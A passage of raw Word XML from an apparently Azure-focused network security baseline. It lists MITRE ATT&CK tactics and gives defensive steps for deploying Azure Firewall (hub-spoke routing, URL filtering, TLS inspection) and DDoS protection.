          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Access to risky or untrusted URLs and applications increases exposure to exploit</w:t>
      </w:r>
      <w:r w:rsidR="00931F18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3B723" w14:textId="59490208" w:rsidR="00931F18" w:rsidRDefault="00931F18" w:rsidP="00931F18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931F18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291413EB" w14:textId="1685E263" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00087977">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087977">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207D9B8" w14:textId="466B8397" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00087977">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087977">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23222182" w14:textId="6CA8EF75" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00087977">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087977">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578EA030" w14:textId="0F34C4F0" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00087977">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087977">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1FA9C" w14:textId="77777777" w:rsidR="001D40EB" w:rsidRDefault="001D40EB" w:rsidP="001D40EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B4D358" w14:textId="34AA5D63" w:rsidR="001D40EB" w:rsidRDefault="001D40EB" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D40EB">
        <w:t>NS-3.1: Prepare for Azure Firewall Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DF537" w14:textId="699B7723" w:rsidR="001E15E4" w:rsidRDefault="001E15E4" w:rsidP="001E15E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E15E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prepare network infrastructure for Azure Firewall deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB38971" w14:textId="24634EBA" w:rsidR="00DB34D7" w:rsidRDefault="00DB34D7" w:rsidP="001E15E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB34D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Set up hub/spoke virtual network topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C0342D" w14:textId="459DD4A9" w:rsidR="00136B99" w:rsidRDefault="00136B99" w:rsidP="001E15E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136B99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Azure Firewall in a hub VNet to centrally manage and secure traffic across multiple spoke VNets hosting application workloads, establishing a single enforcement point for network security policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F6C2F" w14:textId="47F3D9EA" w:rsidR="00C9210B" w:rsidRDefault="00C9210B" w:rsidP="003558C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9210B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Join spoke virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110382D1" w14:textId="3C5895B8" w:rsidR="003558C8" w:rsidRDefault="003558C8" w:rsidP="003558C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003558C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use VNet peering to connect each spoke VNet to the hub VNet where Azure Firewall is deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66778D92" w14:textId="1830C06C" w:rsidR="00AF4B41" w:rsidRDefault="00AF4B41" w:rsidP="003F6B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4B41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure user-defined routes (UDRs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A81E1" w14:textId="4DC0877C" w:rsidR="00AF4B41" w:rsidRDefault="00AF4B41" w:rsidP="00AF4B41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4B41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create route tables directing network traffic from spoke VNets through Azure Firewall in the hub network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58436356" w14:textId="16331D4F" w:rsidR="009E0421" w:rsidRDefault="009A1A24" w:rsidP="009A1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A1A24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy and configure Azure Firewall with comprehensive policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65019726" w14:textId="2E4015AB" w:rsidR="009A1A24" w:rsidRDefault="009A1A24" w:rsidP="009A1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A1A24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Azure Firewall in hub Vnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC41BE" w14:textId="116A766F" w:rsidR="007D3914" w:rsidRDefault="007D3914" w:rsidP="007D3914">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3914">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Azure Firewall (Standard or Premium tier based on features needed) in the hub VNet, assigning both public IP addresses for internet-bound traffic and private IP addresses for internal routing from spoke VNets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ACD8B9" w14:textId="528EE03D" w:rsidR="000431B2" w:rsidRDefault="000431B2" w:rsidP="000431B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000431B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create firewall policies with filtering rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F284AA" w14:textId="35ADDAFD" w:rsidR="000431B2" w:rsidRDefault="000431B2" w:rsidP="000431B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000431B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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2D307AEF" w:rsidR="00771EF8" w:rsidRDefault="00771EF8" w:rsidP="00771EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00771EF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure URL filtering for HTTP/HTTPS traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A40F6E" w14:textId="5301AE7E" w:rsidR="0040656A" w:rsidRDefault="0040656A" w:rsidP="0040656A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040656A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement FQDN-based application rules to allow or deny specific domains (e.g., allow *.microsoft.com, deny *.torrent) and configure category-based filtering to block entire website categories (e.g., Hacking, Social Media) while allowing work-related categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543DD795" w14:textId="46C7C8FF" w:rsidR="00F3402E" w:rsidRDefault="00F3402E" w:rsidP="00F3402E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3402E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable TLS inspection for advanced filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9D2B3" w14:textId="155189A7" w:rsidR="00FE4F8E" w:rsidRDefault="00FE4F8E" w:rsidP="00FE4F8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4F8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For Premium tier deployments, enable TLS inspection by uploading certificates to Azure Key Vault, allowing the firewall to decrypt, inspect, and re-encrypt HTTPS traffic for deeper URL filtering and threat detection beyond SNI-based inspection.</w:t>
      </w:r>
      <w:r w:rsidR="007B3FFD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2F226" w14:textId="29A0B447" w:rsidR="007B3FFD" w:rsidRDefault="007B3FFD" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc236841624"/>
      <w:r w:rsidRPr="007B3FFD">
        <w:t>NS-5: Deploy DDOS protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4EC3DD2B" w14:textId="070BBC06" w:rsidR="00EE2BE9" w:rsidRDefault="00EE2BE9" w:rsidP="00EE2BE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC672E7" w14:textId="25F09ADF" w:rsidR="00EE2BE9" w:rsidRDefault="00EE2BE9" w:rsidP="00EE2BE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy DDoS protection across various tiers to effectively mitigate attacks targeting different services and protocols at both the network and application layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9CD61B" w14:textId="74E64C35" w:rsidR="00EE2BE9" w:rsidRDefault="00434056" w:rsidP="00EE2BE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434056">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="00A703F6" w:rsidRPr="00434056">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1175605A" w14:textId="496A4F40" w:rsidR="00434056" w:rsidRDefault="00434056" w:rsidP="00434056">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434056">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Volumetric attacks (network flooding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F1086" w14:textId="5D8953F8" w:rsidR="00434056" w:rsidRDefault="00434056" w:rsidP="00434056">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434056">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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0A4F49A" w14:textId="26E46AE9" w:rsidR="00A703F6" w:rsidRDefault="00A703F6" w:rsidP="00A703F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Protocol attacks (state exhaustion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171071BD" w14:textId="3C5AD3F8" w:rsidR="00CA1BA0" w:rsidRDefault="00CA1BA0" w:rsidP="00CA1BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA1BA0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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51A9CB5B" w:rsidR="00CA1BA0" w:rsidRDefault="00CA1BA0" w:rsidP="003E39F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA1BA0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Resource layer attacks (application overload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED34A55" w14:textId="632F4CE8" w:rsidR="00CA1BA0" w:rsidRDefault="00CA1BA0" w:rsidP="00CA1BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA1BA0">
        <w:rPr>
